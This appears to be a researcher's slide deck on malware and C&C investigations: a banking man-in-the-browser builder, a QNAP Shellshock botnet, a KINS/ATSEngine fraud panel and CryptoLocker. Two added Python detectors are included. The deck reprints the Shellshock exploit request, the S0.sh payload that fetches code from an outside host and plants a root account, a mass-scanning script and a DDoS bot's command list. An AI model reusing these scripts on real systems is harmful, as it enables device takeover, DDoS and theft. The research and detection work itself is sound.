    • Inside MitbC&C blocks This unique MitB builder is design to help even an unexperienced Hacker to build a MitB attacks just by adding and configuring blocks for every single function and step. Using this method the hacker can interact with the victim’s action in hidden way pushing injected commands inside the browser and hiding them by manipulating CSS and Java scripts. C&C Blocks MitB Server Login Page
  • 22.
    MitB Server WelcomePage 1. In this section we can see the attack campaign details for each bank. 2. The second section is for online victims-bots 3. The last section is for offline victims-bots
  • 23.
    MitB Group Builder Theedit function located into first section is for building a MitB for the victims of that specific bank-group. Here we can see the blocks for building the perfect MitB attack.
  • 24.
    Drop-Down List Commands Thecommand list for every block is described in this dropdown list.  Go – Is allowing the victim to reach the e-banking web application  Question – Building a custom questionaries’ for the victims  Error Question – Asking a questing with error output  Tan – Java-Script function  Error Tan - Java-Script function  Hold – This is the function when victim click the button for transaction.  Error Login – To trick victim that the login details are not correct.  Kick – to kick the victim from e-banking application  Confirm – Building a fake confirm messages  Page – To forward the victim on different page.
  • 25.
    Specific Injections perVictim Another function of this MitB builder is custom injections for every single victim-bot. Here we can see the inject functions that attacker can build for a specific victim-bot. The username and the OTP password for every single command can be seen from the info marked in red box. The attackers can configure the following inject functions. • Button Text • Command • Parameter 1 • Parameter 3 • Style
  • 26.
List of the victims
The attack is alive and the amount of new victims is 5-10 per day.
  • 27.
• Armed QNAP NAS Botnet Revealed
The attackers are sending a GET request with a Shellshock exploit to all IP ranges around the Internet. The successfully hacked NAS devices are forced to download a payload from the Internet; this payload contains an SH script with very clever design logic specially built for QNAP NAS devices. The payload downloads the ELF Linux installer package with BOT functionality for DDOS. From this point the attacker is building persistence with an autorun.sh script inside the compromised NAS device.
  • 28.
Another interesting finding is that the attacker is patching the vulnerable device against the Shellshock vulnerability; by doing this the attacker prevents other hackers from owning the already hacked NAS device. Adding a “request” user with root privileges into the “passwd” and “shadow” files is a classical approach to own a Linux machine. The real aim of this massive hack is the script “armgH.cgi” that the attacker is downloading and installing into the compromised machine.
• This CGI backdoor prepares the NAS to become an armed device ready for DDOS.
• The whole attack schematic is designed to be continuous, in auto-pilot mode.
• So far we managed to detect more than 500 compromised devices.
Attack flow: Massive Shellshock vulnerability attack → Deploy the payload → Patching against Shellshock (persistence) → Arming the NAS for DDOS attacks → Deploy the scanner for Shellshock attack
  • 29.
Attack exploit detected from our IDS devices.
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://xxx.14.xx.xx/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=utf-8
Content-Length: 2250
Date: Sat, 13 Dec 2014 22:09:42 GMT
Server:
HTTP Status 404 - /cgi-bin/authLogin.cgi
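Detection logic for the kind of request captured above, as an added example that is not part of the original presentation: it parses a raw HTTP request, flags the bash function-definition prefix in any header value and pulls out the URLs the trailing command fetches. The sample request is constructed after the capture, with the documentation address 203.0.113.5 standing in for the attacker's host.

```python
"""Shellshock detector for raw HTTP requests.
Added example, not part of the original presentation. The sample request is
constructed after the IDS capture above; 203.0.113.5 is a placeholder host."""
import re

# A vulnerable bash executed whatever followed a "() { ...; };" function body
# that arrived in an environment variable (here: an HTTP header value).
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)")
URL_RE = re.compile(r"https?://\S+")
# CGI that the campaign on this page targeted on QNAP devices.
QNAP_LOGIN_CGI = "/cgi-bin/authLogin.cgi"


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, {header: value})."""
    head = raw.split("\r\n\r\n", 1)[0].replace("\r\n", "\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # junk line; real headers always carry a colon
        name, value = line.split(":", 1)  # tolerates "Host:127.0.0.1" as captured
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def detect_shellshock(raw):
    """Return a finding dict for a Shellshock attempt, or None when no header
    carries a function-definition prefix."""
    method, path, headers = parse_request(raw)
    for name, value in headers.items():
        match = SHELLSHOCK_RE.search(value)
        if not match:
            continue
        cmd = match.group("cmd")
        return {
            "method": method,
            "path": path,
            "header": name,
            "command": cmd,
            "downloads": URL_RE.findall(cmd),
            "qnap_login_cgi": path == QNAP_LOGIN_CGI,
        }
    return None


# Constructed samples: one modelled on the capture above, one benign.
EXPLOIT_REQUEST = (
    "GET /cgi-bin/authLogin.cgi HTTP/1.1\r\n"
    "Host:127.0.0.1\r\n"
    "User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && "
    "/usr/bin/wget -c http://203.0.113.5/S0.sh -P /tmp && /bin/sh /tmp/S0.sh\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /cgi-bin/authLogin.cgi HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print(detect_shellshock(EXPLOIT_REQUEST))
    print(detect_shellshock(BENIGN_REQUEST))  # None
```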
  • 30.
Payload - Hosted in compromised server!
#!/bin/sh
export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin
unset HISTFIE ; unset REMOTEHOST ; unset SHISTORY ; unset BASHISTORY
os=`uname -m`
ip=xxx.14.xx.xx
#wget -P /tmp/ http://qupn.byethost5.com/gH/S0.sh ; cd /tmp/ ; chmod +x S0.sh ; sh S0.sh
#
#
fold=/share/MD0_DATA/optware/.xpl/
if [[ "$os" == 'armv5tel' ]]; then
wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/armgH.cgi
chmod 4755 /home/httpd/cgi-bin/armgH.cgi
mv /home/httpd/cgi-bin/armgH.cgi /home/httpd/cgi-bin/exo.cgi
cp /home/httpd/cgi-bin/exo.cgi ${fold}.exo.cgi
sleep 1
Search="request"
Files="/etc/passwd"
if grep $Search $Files; then
echo "$Search user its just added!"
else
echo "request:x:0:0:request:/share/homes/admin:/bin/sh" >> /etc/passwd
echo 'request:$1$$PpwZ.r22sL5YrJ1ZQr58x0:15166:0:99999:7:::' >> /etc/shadow
#inst patch
wget -P /mnt/HDA_ROOT/update_pkg/ http://eu1.qnap.com/Storage/Qfix/ShellshockFix_1.0.2_20141008_all.bin
#inst scan
sfolder="/share/HDB_DATA/.../"
url69="http://xxx.14.xx.79/run"
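A host-side check for the persistence the S0.sh payload above leaves behind, as an added example that is not part of the original presentation. It looks for the planted “request” account (or any other unexpected uid 0 account) in a passwd file and for the renamed CGI backdoor paths; the passwd text and file tree are constructed samples, and treating the QNAP “admin” account as a legitimate uid 0 account is an assumption.

```python
"""Host-side IOC check for the QNAP persistence planted by the S0.sh payload
above. Added example, not part of the original presentation; the passwd
content and file tree below are constructed samples."""
import os
import tempfile

# Paths the payload creates when it renames armgH.cgi and keeps a hidden copy.
BACKDOOR_PATHS = (
    "home/httpd/cgi-bin/exo.cgi",
    "share/MD0_DATA/optware/.xpl/.exo.cgi",
)
PLANTED_USER = "request"
# Assumption: on QNAP firmware "admin" is a legitimate uid 0 account, so only
# other uid 0 names (and the planted one) count as findings.
EXPECTED_UID0 = {"root", "admin"}


def suspicious_passwd_entries(passwd_text):
    """Return passwd lines that give uid 0 to an unexpected account or that
    belong to the account name the payload appends."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue  # not a well-formed passwd entry
        name, uid = fields[0], fields[2]
        if name == PLANTED_USER or (uid == "0" and name not in EXPECTED_UID0):
            findings.append(line)
    return findings


def present_backdoor_paths(root):
    """Return the backdoor paths that exist under root (e.g. a mounted image)."""
    return [p for p in BACKDOOR_PATHS if os.path.exists(os.path.join(root, p))]


def assess(passwd_text, root):
    """Combine both checks into one verdict for the device under root."""
    users = suspicious_passwd_entries(passwd_text)
    paths = present_backdoor_paths(root)
    return {"compromised": bool(users or paths), "users": users, "paths": paths}


# Constructed samples. The infected passwd carries the line the payload appends.
CLEAN_PASSWD = (
    "root:x:0:0:root:/root:/bin/sh\n"
    "admin:x:0:0:admin:/share/homes/admin:/bin/sh\n"
    "guest:x:65534:65534:guest:/tmp:/bin/sh\n"
)
INFECTED_PASSWD = CLEAN_PASSWD + "request:x:0:0:request:/share/homes/admin:/bin/sh\n"


def make_sample_root(infected):
    """Build a throwaway directory tree that mimics a clean or infected NAS."""
    root = tempfile.mkdtemp(prefix="nas_")
    if infected:
        cgi = os.path.join(root, "home/httpd/cgi-bin/exo.cgi")
        os.makedirs(os.path.dirname(cgi))
        with open(cgi, "w") as fh:
            fh.write("placeholder for the renamed backdoor binary\n")
    return root


if __name__ == "__main__":
    print(assess(INFECTED_PASSWD, make_sample_root(True)))
    print(assess(CLEAN_PASSWD, make_sample_root(False)))
```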
  • 31.
Payload - Arming the NAS devices for DDOS attacks. Hosted in compromised server.
“armgH.cgi” - ELF Linux backdoor with IRC client and DDOS capability. Output from reverse engineering analysis.
PRIVMSG %s :* .exec <commands> - execute a system command
PRIVMSG %s :* .version - show the current version of bot
PRIVMSG %s :* .status - show the status of bot
PRIVMSG %s :* .help - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by you
PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes random
PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class random
PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop - stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof <ip> - set the source address ip spoof
PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder
PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder
PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan <channel> - set new master channel
PRIVMSG %s :* .join <channel> <password> - join bot in selected room
PRIVMSG %s :* .part <channel> - part bot from selected room
PRIVMSG %s :* .quit - kill the current process
  • 32.
Screenshot from a hacked NAS device with the deployed payload; it can be controlled via the CGI web backdoor http://X.X.X.X:8080/cgi-bin/exo.cgi
Mass scanner for Shellshock
This script is taken from a compromised NAS device. The attacker is using the “pnscan” multi-threaded port scanner to search for and hack other vulnerable QNAP NAS devices.
#!/bin/sh
## xXx@code 3-12-2014
rand=`echo $((RANDOM%255+2))`
#url=""
url="http://1xx.xx.xx.xx/S0.sh"
download="/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c $url -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1 nnn"
get="GET /cgi-bin/authLogin.cgi HTTP/1.1nHost: 127.0.0.1nUser-Agent: () { :; }; $download nnn"
./pnscan -rQDoc -w"$get" -t500 -n300 $rand.0.0.0:255.0.0.0 8080 > /dev/null &
  • 33.
• Kins origin malware acting like a real e-banking web app
Uncovering a C&C server used by hackers to control the infected victims. The malware analyses done on the victims’ machines reveal that malware from the KINS family is targeting specific Italian bank users with ATSEngine, with the capability to dynamically inject code in the victim’s browser and manage the “drops” in a fully automatic way.
  • 34.
• IOC
First sample details
malware_family "KINS"
malware_family_version "1.0.0.5"
first_seen_timestamp "2014-05-30 15:15:01"
decrypted_config_size "20708"
decrypted_config_md5 "35bf382ea8e1e711c3d548bcfcfc54af"
encrypted_config_md5 "305edd5731692c828290705c5da279a1"
Entry RelatedBinaries "843046eb1404a49910ab433424d64c6b"
Second sample details
malware_family "KINS"
malware_family_version "1.0.0.5"
first_seen_timestamp "2014-05-23 15:15:01"
decrypted_config_size "20534"
decrypted_config_md5 "0403cf8dd20db5edd762f1089df1c1ba"
encrypted_config_md5 "181d3daf422ab2ca76edefe3a4805403"
Entry RelatedBinaries "8ffe59bc277556ef8b63bf8319bd4c78"
Drop-Zone details
entry "Dropzone" "https://37.XX.XX.XX/css/css.php"
entry "Binary" "https://37.XX.XX.XX/css/upd.exe"
Web-Inject details
entry "Webinject" target "https://www.xxx.xx/xxxx/*"
C&C-Server details
var bname='%BOTID%'; "https://XXX.com/XXX.php?q=2">
  • 35.
• C&C CENTER FUNCTION DETAILS
Behind the front-end, which was password protected, we saw a slightly different version of ATSEngine with the capability to automate the way “drops” money transfers are made from the hacked victims.
• The first page is Accounts, where we can see the status of the victims (“bots”) with their money balance. The statistics at the right show us the grabbed data, transferred money and logs. Also we have the tabs for IP addresses, login IDs and BOT IDs of the victims.
  • 36.
• The second is the DROPS page, where the attacker defines the “drops”, the bank accounts where the stolen money is going to be transferred. Here we can see the tabs for Drop Name, City, Country, IBAN and a memo about the transaction. The system automatically calculates the profit percentage for the person who is receiving the stolen money.
  • 37.
• At the Reports page we can see the logs received from the victims. This shows us that the Man-in-the-Browser attack is designed for Microsoft Internet Explorer versions 8 and 11. Also here the attacker can track the error logs with “View HTML Content” if the attack was unsuccessful. Also here we can see the targeted bank details.
  • 38.
• At the Transfers page we can see the successful “drop” transfers made by the attackers. Here we can see that they stole and transferred 1750 euro to the defined IBAN account.
• Here we can see the “Add Drop” form where attackers can define a new “drop” with all requested details: Memo, IBAN, Name, Country, City, Transfer Memo, Percent of Amount, Min-Max Balance Limit, Min-Max Transfer Limit.
  • 39.
• Add Transfers is the killer option of this version of ATSEngine; here we can create a “TASK” that will be executed on the victim’s machine in a totally hidden way, transferring the money to the predefined “Drop” account. Here we can select the victim from the list and define the date and time when the transfer will occur, with the amount of money that the malware will steal from the victim.
  • 40.
Other research articles.
• Revealing Unique MitB Builder C&C Server – Awareness publication
• NAS Botnet Revealed – Bluekaizen magazine
• Inside Cryptolocker C&C server – eForensics magazine
• Are 2 factor authentications enough to protect your money? – eForensics magazine
• Kins origin malware acting like a Real E-banking web app – Awareness publication
• Infostealer Botnet Reveal – Awareness publication
• State of ART Phishing Attack stealing 50K Credit Cards Reveal – Awareness publication
• One shot eight banks – Awareness publication
• Target List of Hesper-BOT Malware – Awareness publication
• Password cracking: proving your login. Password Cracking – Hakin9 magazine
• Time to alert Spar Kasse Bank Macedonia – Awareness disclosure
• Simple hack into web server of Customs of MK – Awareness disclosure
• Information security awareness at RM – Awareness disclosure
• I discovered a new way of Sim Carrier unlock
• Web Site Count 126 can be HACKED – Awareness disclosure
Full PDF version of my research publications: http://goo.gl/MHzIvC
  • 41.
  • 42.
Story…
• DrayTek Vigor2132FVn NAT with Fiber Optic Internet
• Cisco Meraki MX64 with AMP+TG
• Bridge Vigor2132FVn with Active True IP
• Vodafone forum discussions about the Active True IP and how they disabled it because of security
• Hmmm, let’s play with this router.
  • 43.
  • 44.
Here we can see the script responsible for the configuration changes. Here is the Bridge Mode → just delete the “display:none”.
  • 45.
From disabled change to enabled. Finally click OK and reboot.
  • 46.
  • 47.
Thanks. This will work in all Vodafone DrayTek firmwares until 2016.

Editor's Notes

  • #7 That’s because each layer of this “Defense-in-depth” approach shares the same fundamental flaw: they all use a binary approach to threat detection. Let me explain what I mean by “flaw”. Today’s security solutions are built to inspect traffic and files before they enter the network: everything that is known to be bad is blocked, and everything that is not known to be bad is let in. This means a known good file will pass through the network with no problem and a known threat will get blocked. This makes total sense. The complication comes when your security systems are inspecting an unknown file. Each layer of your security system must make a binary decision: block or admit. In the case of an unknown file, each system will continue to pass the file through to the next layer, because none of them can make a definitive “block” decision, until it’s eventually let into the system. It’s these unknown signatures that sneak past the most robust perimeter defenses. Because once it’s in your network, it doesn’t matter if a security patch comes 5 minutes later: that file is in the network and your system is completely blind to it. The next time you’ll hear from that file is when it’s sending who knows what out of your company… and then the difficult task of investigation and remediation begins. T: Most security vendors will try and sell you on 100% effective security… but that’s a lie. There’s just no way you can block 100% of threats, 100% of the time.
  • #10 “CryptoLocker was a ransomware trojan which targeted computers running Microsoft Windows and was first observed by Dell SecureWorks in September 2013. CryptoLocker propagated via infected email attachments, and via an existing botnet; when activated, the malware encrypts certain types of files stored on local and mounted network drives using RSA public-key cryptography, with the private key stored only on the malware's control servers. The malware then displays a message, which offers to decrypt the data if a payment (through either Bitcoin or a pre-paid cash voucher) is made by a stated deadline, and threatened to delete the private key if the deadline passes. If the deadline is not met, the malware offered to decrypt data via an online service provided by the malware's operators, for a significantly higher price in Bitcoin” (Wikipedia)
  • #11 The CryptoLocker infection process starts when the Microsoft Office Word document is opened. Microsoft allows users to inject macro scripting code inside documents, and gives the possibility to execute it automatically when the document is opened. “A macro is a series of commands and actions that help to automate some tasks - effectively a program but usually quite short and simple. However they are created, they need to be executed by some system which interprets the stored commands” (Wikipedia)
  • #12 Here is a sample taken from the original macro that shows how the malware can communicate with its C&C server and how the code is obfuscated.
xwrr5e2ngn3ofo65cnfwctqt7rvvyxzu0gbdg47u8h3zgt9hcb Chr(104) & Chr(116) & Chr(116) & Chr(1xx) & Chr(x8) & Chr(4x) & Chr(47) & Chr(49) & Chr(48) & Chr(57) & Chr(46) & Chr(xx) & Chr(xx) & Chr(xx) & Chr(4x) & Chr(49) & Chr(xx) & Chr(xx) & Chr(46) & Chr(xx) & Chr(57) & Chr(xx) & Chr(9x) & Chr(x) & Chr(xx) & Chr(110) & Chr(103), Environ(Chr(1xx) & Chr(1xx) & Chr(1xx) & Chr(112)) & Chr(92) & Chr(74) & Chr(75) & Chr(87) & Chr(84) & Chr(89) & Chr(65) & Chr(68) & Chr(88) & Chr(74) & Chr(85) & Chr(77) & Chr(46) & Chr(101) & Chr(xx0) & Chr(xx1)
Many characters are obfuscated (xx) on purpose. The macro we found inside is a VB macro with many functions to hook the malware and download the real .exe from another server. The algorithm used by the malicious encryption is ordinary, and the process injections are as follows:
WINWORD.exe, JKWTYADXJUM.exe, JKWTYADXJUM.exe, explorer.exe, vssadmin.exe, iexplorer.exe, svchost.exe
Fig 2 – Injected process
After the dropper executes the malware, the system is encrypting the personal files with a public PGP key and storing the private key in the C&C server with a time bomb.
  • #13 The functionality of the C&C server is designed to operate in autopilot. There are two main functionalities, one for the victim (“user”) and one for the admin (“admin”).
  • #14 The admin can configure CryptoLocker and the settings of the C&C server with the infection kind and the amount of money they will request from the victims. The attackers can define an INDEX landing page for specific countries with the amount of the ransom, where they can define the before and after amount.
  • #15 The configuration page for the attacker, where he can define the contact e-mail and tor-url for the communications between the victim and the attacker. Also we can see here the payment URL – the Bitcoin wallet setup. The most important option here is the decryption key and application that the C&C will deliver to the victim after the payment.
  • #16 Infected victims are inside the folder BOTS, where the system is creating a new folder after every new spread phishing attack.
  • #17 The BOTNET number 11 contains 2.172 infected victims’ hostnames.
  • #18 The total amount of the targeted victims inside BOTNET11:
• ES.csv = 2580
• GB.csv = 12.904
• IT.csv = 9.689
• NL.csv = 1.809
TOTAL = 26.982
  • #19 A lot of the victims didn’t receive the promised unlock keys, so this is proof that it is not good to pay them money, because they will never ever provide you the keys to unlock.
  • #20 We all know how easy it is to go underground and buy malware-as-a-service kits for trojans, ransomware, DDoS bots etc. But what about a service for Man-in-the-Browser attacks for well-known electronic banking web applications, and also to order a custom one? These injectors are the main weapon used by bad guys against electronic banking applications where 2-factor authentication (“tokens”) is implemented.
  • #23 The home page of the C&C server is divided into 3 sections. In the first section we can see the attack campaign details for each bank. The second section is for online victims-bots. The last section is for offline victims-bots.
  • #34 Uncovering a C&C server used by hackers to control the infected victims. The malware analyses done on the victims’ machines reveal that malware from the KINS family is targeting specific Italian bank users with ATSEngine, with the capability to dynamically inject code in the victim’s browser and manage the “drops” in a fully automatic way. The attack campaign is ongoing right now and we recovered hacked accounts. Besides that, we reveal the “drops” used to collect the stolen money from the customers.
  • #44 What we need for this hack:
1. BurpSuite (free)
2. FireFox (free)